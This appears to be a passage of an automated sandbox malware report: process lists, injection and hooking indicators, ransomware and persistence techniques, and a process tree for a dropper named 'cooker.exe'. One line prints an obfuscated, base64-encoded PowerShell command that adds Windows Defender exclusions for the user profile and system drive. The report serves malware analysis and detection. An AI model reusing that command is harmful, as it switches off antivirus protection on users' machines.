2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe
2108	chrome.exe

Suspicious use of SetWindowsHookEx 35 IoCs

pid	Process
2460	@[email protected]
2460	@[email protected]
5380	@[email protected]
5380	@[email protected]
5160	@[email protected]
5160	@[email protected]
5104	@[email protected]
5348	@[email protected]
1920	@[email protected]
1020	@[email protected]
2416	@[email protected]
116	@[email protected]
9888	@[email protected]
8668	@[email protected]
8428	@[email protected]
1820	@[email protected]
5084	@[email protected]
8448	@[email protected]
9340	@[email protected]
8240	@[email protected]
8864	@[email protected]
916	@[email protected]
3564	@[email protected]
9836	@[email protected]
8656	@[email protected]
6772	@[email protected]
7612	@[email protected]
10232	@[email protected]
5168	@[email protected]
6284	@[email protected]
4632	@[email protected]
8276	@[email protected]
2104	@[email protected]
6064	@[email protected]
4792	@[email protected]

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 1864	1948	cooker.exe	90
PID 1948 wrote to memory of 1864	1948	cooker.exe	90
PID 1948 wrote to memory of 1864	1948	cooker.exe	90
PID 1948 wrote to memory of 2404	1948	cooker.exe	92
PID 1948 wrote to memory of 2404	1948	cooker.exe	92
PID 1948 wrote to memory of 2404	1948	cooker.exe	92
PID 1948 wrote to memory of 5004	1948	cooker.exe	93
PID 1948 wrote to memory of 5004	1948	cooker.exe	93
PID 1948 wrote to memory of 5004	1948	cooker.exe	93
PID 1948 wrote to memory of 4924	1948	cooker.exe	94
PID 1948 wrote to memory of 4924	1948	cooker.exe	94
PID 1948 wrote to memory of 4924	1948	cooker.exe	94
PID 4924 wrote to memory of 5132	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	96
PID 4924 wrote to memory of 5132	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	96
PID 4924 wrote to memory of 5132	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	96
PID 4924 wrote to memory of 1044	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	97
PID 4924 wrote to memory of 1044	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	97
PID 4924 wrote to memory of 1044	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	97
PID 1948 wrote to memory of 1296	1948	cooker.exe	95
PID 1948 wrote to memory of 1296	1948	cooker.exe	95
PID 1948 wrote to memory of 1296	1948	cooker.exe	95
PID 1296 wrote to memory of 5112	1296	Cyber Sniff.exe	162
PID 1296 wrote to memory of 5112	1296	Cyber Sniff.exe	162
PID 1296 wrote to memory of 5112	1296	Cyber Sniff.exe	162
PID 1296 wrote to memory of 5080	1296	Cyber Sniff.exe	102
PID 1296 wrote to memory of 5080	1296	Cyber Sniff.exe	102
PID 1296 wrote to memory of 1992	1296	Cyber Sniff.exe	103
PID 1296 wrote to memory of 1992	1296	Cyber Sniff.exe	103
PID 1296 wrote to memory of 4320	1296	Cyber Sniff.exe	104
PID 1296 wrote to memory of 4320	1296	Cyber Sniff.exe	104
PID 1992 wrote to memory of 3652	1992	PACKED.exe	105
PID 1992 wrote to memory of 3652	1992	PACKED.exe	105
PID 3652 wrote to memory of 3504	3652	PACKED.exe	106
PID 3652 wrote to memory of 3504	3652	PACKED.exe	106
PID 4924 wrote to memory of 2524	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	157
PID 4924 wrote to memory of 2524	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	157
PID 4924 wrote to memory of 2524	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	157
PID 3652 wrote to memory of 5972	3652	PACKED.exe	109
PID 3652 wrote to memory of 5972	3652	PACKED.exe	109
PID 4924 wrote to memory of 6124	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	110
PID 4924 wrote to memory of 6124	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	110
PID 4924 wrote to memory of 6124	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	110
PID 3652 wrote to memory of 5840	3652	PACKED.exe	111
PID 3652 wrote to memory of 5840	3652	PACKED.exe	111
PID 3652 wrote to memory of 5632	3652	PACKED.exe	113
PID 3652 wrote to memory of 5632	3652	PACKED.exe	113
PID 3652 wrote to memory of 5996	3652	PACKED.exe	116
PID 3652 wrote to memory of 5996	3652	PACKED.exe	116
PID 4924 wrote to memory of 1512	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	119
PID 4924 wrote to memory of 1512	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	119
PID 4924 wrote to memory of 1512	4924	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe	119
PID 5840 wrote to memory of 5668	5840	cmd.exe	121
PID 5840 wrote to memory of 5668	5840	cmd.exe	121
PID 5972 wrote to memory of 2372	5972	cmd.exe	122
PID 5972 wrote to memory of 2372	5972	cmd.exe	122
PID 5996 wrote to memory of 5148	5996	cmd.exe	123
PID 5996 wrote to memory of 5148	5996	cmd.exe	123
PID 6124 wrote to memory of 5496	6124	cmd.exe	131
PID 6124 wrote to memory of 5496	6124	cmd.exe	131
PID 6124 wrote to memory of 5496	6124	cmd.exe	131
PID 3652 wrote to memory of 5852	3652	PACKED.exe	132
PID 3652 wrote to memory of 5852	3652	PACKED.exe	132
PID 5852 wrote to memory of 4252	5852	cmd.exe	134
PID 5852 wrote to memory of 4252	5852	cmd.exe	134

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 4 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
5132	attrib.exe
5820	attrib.exe
8892	attrib.exe
1512	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cooker.exe
"C:\Users\Admin\AppData\Local\Temp\cooker.exe"
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1948
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAYwBkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGIAdABoACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdQBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGQAZQB3ACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1864
- C:\Users\Admin\AppData\Roaming\kitty_portable.exe
  "C:\Users\Admin\AppData\Roaming\kitty_portable.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:2404
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.9bis.net/kitty/#!pages/donation.md
    3⤵
    - Checks processor information in registry
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Modifies registry class
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1860
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2c8,0x2cc,0x2d0,0x2a4,0x2f0,0x7ffd1d1df208,0x7ffd1d1df214,0x7ffd1d1df220
      4⤵
      PID:1104
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1932,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=2300 /prefetch:3
      4⤵
      PID:2612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2260,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=2256 /prefetch:2
      4⤵
      PID:2932
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2612,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:8
      4⤵
      PID:1664
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3432,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=3488 /prefetch:1
      4⤵
      PID:1356
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
      4⤵
      PID:2204
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4252,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=4272 /prefetch:1
      4⤵
      PID:1600
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=3500,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=4580 /prefetch:1
      4⤵
      PID:5156
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5260,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=5272 /prefetch:1
      4⤵
      PID:5888
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --always-read-main-dll --field-trial-handle=4676,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:1
      4⤵
      PID:2684
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5500,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=5552 /prefetch:8
      4⤵
      PID:2528
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5512,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=5576 /prefetch:8
      4⤵
      PID:2040
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5928,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=5912 /prefetch:8
      4⤵
      PID:1460
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:8
      4⤵
      PID:3584
  - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6208,i,8198027641971777334,16508044668550687245,262144 --variations-seed-version --mojo-platform-channel-handle=6252 /prefetch:8
      4⤵
      PID:5804
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
      4⤵
      Checks processor information in registry
      Enumerates system info in registry
      Modifies data under HKEY_USERS
      Modifies registry class
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:1736
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x264,0x7ffd1d1df208,0x7ffd1d1df214,0x7ffd1d1df220
        5⤵
        
        PID:3904
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1724,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=2292 /prefetch:3
        5⤵
        
        PID:5748
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2256,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=2244 /prefetch:2
        5⤵
        
        PID:4588
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2460,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=2484 /prefetch:8
        5⤵
        
        PID:2108
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4404,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=4444 /prefetch:8
        5⤵
        
        PID:856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4404,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=4444 /prefetch:8
        5⤵
        
        PID:1912
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4540,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=120 /prefetch:8
        5⤵
        
        PID:5828
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4664,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=4896 /prefetch:1
        5⤵
        
        PID:5256
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4640,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=4912 /prefetch:1
        5⤵
        
        PID:4576
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4728,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=5404 /prefetch:8
        5⤵
        
        PID:5364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4724,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=5444 /prefetch:8
        5⤵
        
        PID:4560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4624,i,2237725773843791551,15555660344140697333,262144 --variations-seed-version --mojo-platform-channel-handle=5852 /prefetch:1
        5⤵
        
        PID:5548
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
        5⤵
        Drops file in Program Files directory
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Modifies registry class
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        
        PID:5856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2f4,0x7ffd1d1df208,0x7ffd1d1df214,0x7ffd1d1df220
        6⤵
        
        PID:2016
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1968,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=1964 /prefetch:2
        6⤵
        
        PID:3708
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=2196,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=2268 /prefetch:3
        6⤵
        
        PID:5792
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1944,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=2644 /prefetch:8
        6⤵
        
        PID:3924
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:8
        6⤵
        
        PID:5476
      - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4340,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:8
        6⤵
        
        PID:1940
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4444,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4344 /prefetch:8
        6⤵
        
        PID:3576
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4420,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4560 /prefetch:8
        6⤵
        
        PID:6000
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4408,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4548 /prefetch:8
        6⤵
        
        PID:1920
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4380,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4524 /prefetch:8
        6⤵
        
        PID:856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=4484,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4828 /prefetch:1
        6⤵
        
        PID:4036
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --always-read-main-dll --field-trial-handle=4700,i,15997181751952981477,16731226312764483235,262144 --variations-seed-version --mojo-platform-channel-handle=4808 /prefetch:1
        6⤵
        
        PID:2548
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
